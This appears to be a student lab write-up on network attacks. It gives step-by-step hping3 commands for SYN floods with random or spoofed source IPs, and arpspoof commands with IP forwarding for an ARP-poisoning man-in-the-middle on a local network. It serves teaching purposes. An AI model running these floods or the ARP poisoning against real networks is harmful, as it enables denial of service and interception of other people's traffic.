1.IP Spoofing:
IP spoofing is the creation of Internet Protocol (IP) packets which have a modified source address in
order to either hide the identity of the sender, to impersonate another computer system, or both. It is 
a technique often used by bad actors to invoke DDoS attacks against a target device or the 
surrounding infrastructure.
Usage
hping is a command-line oriented TCP/IP packet assembler/analyzer.
To send flood from random ip’s:
hping3 --flood -p <Destination Port> <Victim IP> -S --rand-source
To send flood from a specific spoofed ip:
hping3 --flood -p <Destination Port> <Victim IP> -S --spoof <Inactive IP>
 --flood
 Sent packets as fast as possible, without taking care to show
 incoming replies. This is ways faster than to specify the -i u0
 option.
-p –dest.port
 Set destination port
 -S --syn
 Set SYN tcp flag.
Step 1: Open terminal and type in “hping3 --flood -p 80 192.168.1.100 -S --rand-source” 
 or
“ hping3 --flood -p 80 192.168.1.102 -S –spoof 192.168.1.109”
(To send flood from specified spoofed ip<192.168.1.109>)
Random:
Specific:
Step 2: Open Wireshark to see the traffic and observe that source keeps on changing although the 
desitination remains same in random where as in spoofed specific ip the source remains same as the
spoofed one!
Random:
Specific:
Step 3: Open Task manager in the Victim’s PC there we can observe the jump in network traffic 
without sending any requests from the victim’s machine!
Before:
After:
2.ARP Spoofing:
ARP spoofing is a type of attack in which a malicious actor sends falsified ARP (Address 
Resolution Protocol) messages over a local area network. This results in the linking of an attacker's 
MAC address with the IP address of a legitimate computer or server on the network
Usage:
 arpspoof -i <interface> -t <target IP> <gateway ip>
Procedure:
Step 1: Type in “ip r” gives the gateway ip of the router
Here GatewayIp is 192.168.1.1
Step 2: Now we need to know the victim IP say,192.168.100
Step 3: Type in “ifconfig” to know the interface and mac id we are using
As mine are: 
 MAC Address 50:5b:c2:d4:07:99 
 Interface: wlan0
Step 4: Type in “arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1” here this command is to spoof 
target that I am the router
Step 5: Type in “arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100” here this command is to spoof 
router that I am the target
Here a8:6b:ad:3c:c0:95(Victim’s MAC id),bc:8a:e8:43:4f:8e(Router MAC id) and 
50:5b:c2:d4:7:99(Attackers MAC id)
Step 6: Type in “echo 1 > /proc/sys/net/ipv4/ip_forward”
Enable the IP forwarding. so that when the packets flow through our attacker machine,they don't get
dropped so that each packet that goes through our device gets actually forwarded to its destination. 
So, when we get a packet from the client, it goes to the router, and when a packet comes from the 
router, it should go to the client without being dropped in our device.
We can check the attack effectiveness in ARP tables in the victim machine
Before ArpSpoof:
After ArpSpoof